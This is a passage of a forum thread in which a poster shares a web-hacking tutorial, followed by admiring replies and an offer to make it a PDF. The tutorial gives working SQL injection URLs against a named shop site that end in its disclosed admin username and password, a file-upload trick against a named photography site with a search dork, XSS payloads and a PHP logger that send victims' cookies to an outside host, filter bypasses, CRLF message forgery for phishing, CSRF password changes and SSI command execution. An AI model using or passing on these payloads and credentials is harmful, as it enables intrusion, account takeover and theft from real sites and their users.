s13.postimage.org/6ivvov0iv/img2.jpg

3) Finding table name
Code
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 table_name from information_schema.tables))




s7.postimage.org/qdv7qr5uz/img3.jpg

We want admin table, so we type next:
Code
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Tab_FinalOrder')))




s15.postimage.org/sp0nmn9hn/img4.jpg

admin table name is AdminMaster

4) Finding columns in admin table

Code
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name = 'AdminMaster'))




Code
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name = 'AdminMaster' and column_name not in ('Admin_name')))




Columns names:

s14.postimage.org/pwr77oewh/img5.jpg

s17.postimage.org/5i2zlmuu7/img6.jpg

5) Finding username and password

Code
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 Admin_name from AdminMaster))




s15.postimage.org/hr7rnfeff/img7.jpg

Code
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 Admin_password from AdminMaster))




s11.postimage.org/kvxwwklyr/img8.jpg

Code
Username: admin
Password: pothys!@#




[XII] Dot net nuke

DNN is gallery where you can upload on site and in there you can hold pictures and have like "online gallery". That gallery have hole in itself so you can use it to upload files on site with extension: *.gif, *.jpg, *.pdf, *.txt, *.swf..

Google dork to find vulnerable sites:
Code
inurl:fck/fcklinkgallery.aspx




I'm going to use this site:
Code
http://kellyballancephotography.com/providers/htmleditorproviders/fck/fcklinkgallery.aspx




Now if page is loaded it will look like this:

s18.postimage.org/erglobawp/image.jpg

which means that we can continue. Now we choose option 3 -> File (A File On Your Site) and we type javascript to upload file.

Code
javascript:__doPostBack('ctlURL$cmdUpload','')




Choose File and Text button Upload Selected File will show up.

*on this site letter color matched with background so you will have to select whole page (CTRL+A) and you will see upload button.

s17.postimage.org/6meo81nrz/image.jpg

Upload file and access it by going to sitelink.com/portals/0/filename.extension
->
Code
http://kellyballancephotography.com/portals/0/config.txt




[XIII] XSS

1) XSS?

XSS lets attacker to execute Javascript code. XSS is shortcut of Cross Site Scripting.
You can use XSS for many ways. For simple Javascript executing commands, or you can use it to steal cookies. We are Injecting Cookies so we can login somewhere w/o password.

2) Required stuff

Mozila FireFox:
Code
http://www.mozilla.org/en-US/products/download.html?product=firefox-3.0.5&os=win&lang=en-GB




Add-on Firebug:
Code
https://addons.mozilla.org/en-US/firefox/addon/firebug/




Add-on FireCookie:
Code
https://addons.mozilla.org/en-US/firefox/addon/firecookie/




Add-on Live HTTP Headers:
Code
https://addons.mozilla.org/en-US/firefox/downloads/file/28118/live_http_headers-0.14-fx+sm.xpi




It is recommended to have primary knowledge of Javascripts.

3) Testing XSS vulnerability

Sites on which we can use this method are sites where is text input and submit button and on sites where you can use GET method to print something.
e.g. of GET method:
Code
www.sitecom/index.php?page=<script>alert("XSS")</script>




Command to check site vulnerability is:
Code
<script>alert("XSS")</script>




Now I will explain what this command is doing:
<script> - opening script tag
alert("XSS") - window will pop-up saying "XSS"
</script> - close script tag

4) XSS types

Cookie Stealing - we are stealing cookies from some user (commonly admin), and input cookie in our browser so when we login to site we are gonna be logged in alrdy.
Cross-Site Request Forgery - we are sending some commands without knowing username.
XSS Worms - it is "evil" script that have possibility to spread over whole site.
Door-Forwarding - script makes iframe which will exploit something or start download some virus, rat, keylogger, istealer, etc...
Keylogging - you know what keylogging is.

5) Cookie Stealing

For cookie stealing we will need:
-Vulnerable site
-Web-host for scripts
-php script

attach this script on some hosting:

cookie.php
Code
<?php                                                                                                             
$cookie = $HTTP_GET_VARS["cookie"];                                                                     
$file = fopen('cookielog.txt', 'a');                                                       
fwrite($file, $cookie."\n");                                                                 
?>




script executing:
Code
<script>document.location="http://www.link.com/cookie.php?cookie=" + document.cookie;</script>
ili
<script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script>
ili
<script>window.open('http://www.link.com/cookie.php?cookie=' + document.cookie;)</script>
ili
<script>window.location='http://www.link.com/cookie.php?cookie=' + document.cookie;</script>




How this works?
When some user log on page with your cookie logger and you save his cookie. Then we take cookie and use it. So here is how we do it:

1) Open Mozilla
2) Open Add-on Fire bug

s9.postimage.org/r42pchyjz/aa2.jpg

3) Type cookie name and value. Here is one:
Code
PHPSESSID=db3e4e100ab6bb912de1b80c4eed7898



from this cookie title is PHPSESSID
from this cookie value is b3e4e100ab6bb912de1b80c4eed7898

6) Filter bypassing

1) Deleting script tag
e.g. if we type <script>alert("XSS")</script> and he put only command alert("XSS"). This script delete tags <script> and </script>
Here is also how to bypass protection: Instead of <script>alert("XSS")</script> we will add <scr<script>ipt>alert("XSS")</scr</script>ipt>

2) magic_quotes
Explained here:
Code
http://en.wikipedia.org/wiki/Magic_quotes




If you type <script>alert("XSS")</script> and it prints <script>alert(\"XSS\")</script> then it is magic_quotes protection.
It is a bit harder to bypass magic_quotes protection. It works over String.fromCharCode.
Here is example:
This is link of our cookie logger: http://link.com/cookie.php we would use <script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script> into:
Code
<scr<script>ipt>location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,108&#8203;,105,110,107,46,99,111,109,47,99,111,111,107,105,101,46,112,104,112,63,99,111,11&#8203;1,107,105,101,61,)+document.cookie;</scr</script>ipt>




This works when you add \ code ' or " and when you use integer you do not use ' or "

and here: http://www.link.com/cookie.php?cookie= we also converted decimal code with this tool:
Code
Ascii to Decimal


" target="_blank" title="autolink">http://pookey.co.uk/binary.php[/code]

[XIV] CRLF

1) CRLF?

Shortcut from Carriage Return and Line Feed. CRLF is very easy to use. It is actually like we are adding new row (\n).

2) Vulnerable places

Vulnerable places are anywhere. In this tut. I'm gonna use some chat.

3) Exploiting vulnerability and protection

Lets say if you send message chat will look like this:
Code
1.4.2012 10:29 - fodex: Why login page is down?
1.4.2012 10:29 - saiR: Look like somebody deleted login database.
1.4.2012 10:29 - Admin: I'm gonna check this out and will announce you.
1.4.2012 10:30 - saiR: Ok go ahead...\n1.4.2012 10:30 - Admin: You are right saiR login database is deleted. Log in here till I get it back:

" target="_blank" title="autolink">http://vulnerablesite.com/login.php[/code]

If chat is vulnerable, it's gonna look like this:
Code
1.4.2012 10:30 - saiR: Ok go ahead...
1.4.2012 10:30 - Admin: You are right saiR login database is deleted. Log in here till I get it back:

" target="_blank" title="autolink">http://vulnerablesite.com/login.php[/code]

We wrote second msg from Admin and users will think that Admin sent it actually and will log in to site we gave them. With login we are gonna keylog site logins.


4) Vulnerable script

e.g.
Code
<?php
if(isset($_POST['send_message']))
{
   if(!empty($_POST['message']))
   {
      $message = htmlspecialchars($_POST['message']);
      // rest code to send msg
   }
}
?>




[XV] CSRF

1) CSRF?

Shortcut from Cross Site Request Forgery. CSRF is mix of XSS and LFI. It is used to execute something without knowing username.

2) Vulnerable places

Can be used when you are using GET method. If CSRF is dont successfully, attacker can change password of some user. Most common vulnerable places are avatars.

3) Exploiting vulnerability

Lets say we have profile link:
Code
http://www.link.com/profile.php




Where you can see user data (username, avatar, email...).
Now when user want to edit his profile using e.g.
Code
http://www.link.com/edit_profile.php




Now instead of avatar link we gonna add link from profile editing together with new code using GET method.

NOTE: We have to use GET method during profile editing otherwise we wont be able to attack.

Add avatar link:
Code
http://www.link.com/edit_profile.php?password=newpassword




password is name of input (It can be different, it's best to chekc source code)

Now when we look at avatar we wont be able to see picture (like there is no picture). When other user watch your avatar, if attack was successful, his password is gonna be changed in one we put.

[XVI] Server Side Includes | Server Side Inclusion

1) Introduction Server Side Includes

Server Side includes enables us to do some things faster on sites. Over SSIncludes we ca update DB, send mails and many other functions. SSI is working like when some run script on that site. Default extension for SSI files is .shtml
To get SSI working in that directory where is .shtml is located must be .htaccess file, which holds some configuration included inside file.
SSIs is by default disabled you can enable it by creating new .htaccess file with this config:
Code
AddType text/html .shtml
AddHandler server-parsed .shtml
AddHandler server-parsed .html
Options Indexes FollowSymLinks Includes




2) SSI creating

We are starting script with <!--#
Some simple script look like this:
<command> <variable>=<variable content>-->

Code
<command> -
config
include
flow
set
printenv
echo
exec
fsize
flastmod
time & date




With --> we end script.

script e.g.
Code
<!--#include file="yourfilename.txt" -->
<!--#echo var='This will write this stupid text.'-->




3) Server Side Inclusion

Server Side Inclusion Attack is very useful attacking method. For this it's recommended to have primary knowledge of Bash and Batch programming.

Site is vulnerable on SSI when extensions ‘.shtml’ ‘.shtm’ or ‘.stm’, are included in Apache config file.
e.g. we can create file with next command:
Code
<!--#exec cmd='ls -la'-->




Save this as .shtml file and open it on site.

I think you already know what is going to happen.
Hope this helped you!

Thanks For Reading

credits: EliteHackForums

Posted by buglu on 02/12/2014 10:13:55
#2

Hey Hax,

A very nice tutorial of different hacking methods!

Also a very nice written guide on the most methods.

But I want to point out that the nullbyte injection isnt really common anymore. It has been fixed since php 5.2.x or something. Teddy posted a link about it on my Thread: local file inclusion.


But beside that, a very nice article ;)

Edited by buglu on 02/13/2014 03:22:18

Posted by Override on 02/12/2014 19:44:01
#3

A very well put together tutorial. Thank you for sharing.

Posted by hax366 on 02/13/2014 05:25:40
#4

buglu wrote:
Hey Hax,

A very nice tutorial of different hacking methods!

Also a very nice written guide on the most methods.

But I want to point out that the nullbyte injection isnt really common anymore. It has been fixed since php 5.2.x or something. Teddy posted a link about it on my Thread: local file inclusion.


But beside that, a very nice article ;)


yeah fine but nullbyte injection is still for a reference :)

:D thanks

Posted by hax366 on 02/13/2014 05:26:37
#5

Override wrote:
A very well put together tutorial. Thank you for sharing.


yeah its my pleasure :) i am just a SO Lov3r <3

Posted by Slappy on 02/13/2014 21:02:22
#6

This is great mate. Thanks for your efforts,

Posted by r0am3r on 02/16/2014 05:08:27
#7

Great guide hax366!

Posted by unknownX on 03/14/2014 11:14:43
#8

Nice tutorial bro thanks :)B)

Posted by trojan_dz on 03/15/2014 05:22:56
#9

Awsome :D

Posted by neoxquick on 03/23/2014 16:56:29
#10

would it be possible to get this in pdf file??

Posted by im404 on 05/01/2014 14:11:25
#11

Mark! Thank you Very much! :P

Posted by neoxquick on 05/01/2014 19:50:29
#12

can you put this into pdf?


bye N

Posted by lagon on 05/11/2014 05:21:07
#13

That must be the most detailed tut i've ever seen !
thnx

Posted by PythonB on 05/11/2014 21:09:39
#14

Wonder how long it took u to do this mate! THANKS

Posted by fishassassin on 06/30/2014 21:15:10
#15

Hey guys... Assuming it's okay with hax366, I'm in the process of converting his post into a PDF. It'll take some time, because formatting a file that large is really boring, but I should have it done in a day or two.

EDIT: I've formatted the post into a .PDF to the best of my abilities, and uploaded it into the Security Override File Database under the 'articles' section. It is titled "hax366 webhacking tut.pdf"

Edited by fishassassin on 07/02/2014 23:54:36